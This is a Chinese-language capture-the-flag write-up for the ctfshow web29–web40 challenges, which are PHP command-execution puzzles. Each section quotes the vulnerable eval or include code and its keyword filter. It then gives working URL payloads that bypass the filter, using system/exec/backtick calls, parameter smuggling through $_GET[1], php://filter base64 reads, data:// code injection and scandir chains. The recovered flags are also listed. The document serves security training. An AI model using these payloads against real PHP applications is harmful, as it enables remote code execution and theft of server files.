ctfshow web29-web40

命令执行

看清都过滤了些什么！！

知识点：

web34：当;和()被过滤了就用语言结构，一般有echo print isset unset include require

web37：data协议是将后面的字符串当成php代码执行，例如 /?c=data://text/plain,<?php system('cp fla?.php 1.txt');?>

web38：短标签/?c=data://text/plain,<?=system("cp fla* 1.txt");?>

web29(shell指令)

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

分析上面的php代码可知如果传递了c变量，它将被赋值给变量$c，又因为有正则表达式，检查变量$c中是否包含字符串"flag"（不区分大小写）

如果变量$c中不包含字符串"flag"，则执行eval($c);，将$c作为PHP代码进行解析和执行

试了?c=任意字符不对

1.查看phpinfo

phpinfo() 是 PHP 中的一个函数，用于显示 PHP 运行环境的配置信息。该函数可以显示 PHP 的版本信息、编译器信息、模块信息、配置信息等，可以帮助开发者了解 PHP 的运行环境和配置信息。

/?c=phpinfo();
/?c=phpinfo()?>

2.查看目录

system

/?c=system(ls);

发现存在flag.php

3.尝试使用shell指令查看flag

///将flag.php复制到1.txt

执行后无回显

?c=system("cp fla?.php 1.txt");

查看flag

/1.txt

web30(exec)

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php/i", $c)){eval($c);}}else{ highlight_file(__FILE__);
}

过滤了flag，system，php

解法一：

这里用exec执行函数，虽然exec对执行结果不输出，但是不代表不可以查看flag，这里用函数执行复制（将flag复制给1.txt，直接用浏览器访问1.txt），由于flag被过滤，这里用通配符表示

/?c=exec('cp fla* 1.txt');

用passthru函数执行命令也可以查看目录

/?c=passthru('ls');

下面这个也可以查出目录，注意是``` 不是'''

/?c=echo `ls`;

方法二：

/?c=echo `cat ????.???`;

但没有返回结果，可能是php文件将flag当变量解析了

类似于这样

同样将原本的flag.php重命名

/?c=echo `cat ????.??? >> 1.txt`;

再查看1.txt就有flag了回显了

知识点：

直接/?c=`cp fla?.??? 1.ttx`;也是可以的``相当于system

php执行系统外部命令函数：exec()、passthru()、system()、shell_exec()

web31

代码审计

php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了flag system php cat sort shell \. 空格 \'

空格都过滤了

做题思路就是绕过过滤

嵌套异或逃逸：eval()

&符号作为连接并且，使用get的1作为一个参数，传给c，再给1一个赋值，这样就可以跳过对c的过滤。

这里1就相当于参数逃逸出去了，不属于c

eval() 函数用来执行一个字符串表达式，并返回表达式的值。无回显

/?c=eval($_GET[1]);&1=system('ls');

下一步

/?c=eval($_GET[1]);&1=system('cat flag.php');

还是无回显，源代码中查看

还可以用cat的倒叙tac

/?c=eval($_GET[1]);&1=system('tac flag.php');

会直接显示在页面不用查看源代码

相当于借助了一个跳板，让他执行参数1的值，参数1就脱离了对参数c的正则判断

web32

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i"

绕过flag 、system、php、cat、sort、shell、. 、空格、’、` 、echo、；、括号

括号也被过滤了，web31的方法行不通

文件包含include(）

/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

php://filter/convert.base64-encode/resource是过滤器也是伪协议，意思是通过指定的通道来读取某个文件

分析：

?c=include%0a$_GET[1]?>：通过GET请求传递参数"c"，并使用include函数来包含指定的文件。在这个payload中，使用"%0a"来表示换行符"\n"，使得$_GET[1]能够被解析为一个新的变量。最终的目的是执行从GET参数"1"中获取的文件路径。

1=php://filter/convert.base64-encode/resource=flag.php：使用GET请求传递参数"1"，该参数的值为php://filter/convert.base64-encode/resource=flag.php。这是一种特殊的文件包含方式，其中php://filter用于对文件进行过滤和转换，convert.base64-encode表示将文件内容进行Base64编码，而resource=flag.php指定了要读取的文件为flag.php。

二者用&连接，参数"1"可变，前后要一致

/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

利用文件包含，将flag.php包含进来。再使用过滤器，base64编码读取flag

filter：通过指定的通道来读取指定的文件
这里使用base64读取
不用base64读不到源文件

之后base64解码

ctfshow{8056c2ba-9a09-4b94-acdd-20c2030d6e2e}

web33

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了

绕过 flag system php cat sort shell . ’ ` echo ; ( " 空格的过滤

同web32，既然过滤了括号就用include(文件包含)

(注意一个自己经常犯的错误就是将0输成字母o)

/?c=include%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

得到base64编码后解码

flag

ctfshow{1a7bb049-5a66-4b3b-bdd5-a18fdc588e86}

也可以不用include

require

/?c=require%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web34

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了flag system php cat shell sort . ’ ` echo ; : "

过滤了括号，同web32用include

/?c=include%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

base64解码得flag

ctfshow{7772b93d-741a-4162-bce5-2715b5f968da}

web35

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了 flag system php cat sort shell . 空格 ' ` echo ;( : " < =

这次多了<=

同web34用include

/?c=include%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

base64编码解码得flag

ctfshow{bd3a8999-bebb-4891-b65c-71cfce527138}

web36

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了flag system php cat sort shell . 空格 ' ` echo ; ( : "< = / [0-9]

数字也被过滤了，但在web32中提过，参数1是可变的，前后一致即可

还是用include

将参数1换成参数a

/?c=include%0A$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

base64解码

33360a68-e0fd-40dc-8d5e-4a8a28ef3cc1

web37

代码审计

<?php
//flag in flag.php 
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

题目说flag in flag.php ，并且使用include包含输入

过滤了flag

新知识：

data协议：

text/plain,<?php system(‘命令’);?>

将后面的字符串当php代码执行

/?c=data://text/plain,<?php system('cp fla?.php 1.txt');?>

将flag.php的内容复制到1.txt中，也可以mv fla?.php 1.txt

查看1.txt

ctfshow{1cf13af4-3a5e-4440-aeb8-0e19523c36c7}

知识点：data伪协议的利用

web38

代码审计

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|php|file/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

过滤了flag php file

试了/?c=data://text/plain,<?php system("cp fla* 1.txt");?>

对啊 php被过滤了

将php换成= 变成短标签

/?c=data://text/plain,<?=system("cp fla* 1.txt");?>

查看1.txt拿到flag

ctfshow{fb22ff01-0402-4424-a89a-13f32d3d12e4}

web39

代码审计

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c.".php");}}else{highlight_file(__FILE__);
}

过滤了flag

用data协议

/?c=data://text/plain,<?php system("ls");?>

tac 反向输出flag

/?c=data://text/plain,<?php system("tac fla?.php");?>

ctfshow{fbb2671b-e664-4f62-850e-6d76c00ccfc6}

看着有点眼熟，方法跟web37一样

php代码上有一点点不一样

include($c); echo $flag; 和include($c.".php");

web40

代码审计

<?php
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了[0-9] ~ ` @ # \$ % ^ & * （） - = + { [ ] } : ' " , < . > / ? \\

一眼看去过滤了好多符号，没有过滤字母

有提示：show_source(next(array_reverse(scandir(pos(localeconv()))))); GXYCTF的禁止套娃通过cookie获得参数进行命令执行

c=session_start();system(session_id());
passid=ls

提示就有payload：

/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

ctfshow{e4d160e6-924f-4e8d-bd4f-fd3084875a3c}

自己的方法：

拿到当前的变量

/?c=print_r(get_defined_vars());

有点不一样

/?c=print_r(next(get_defined_vars()));

/?c=print(array_pop(next(get_defined_vars())));

显示php版本

让他执行一下

/?c=eval(array_pop(next(get_defined_vars())));

博主是可以出来的，但我不可以

执行成功可以rce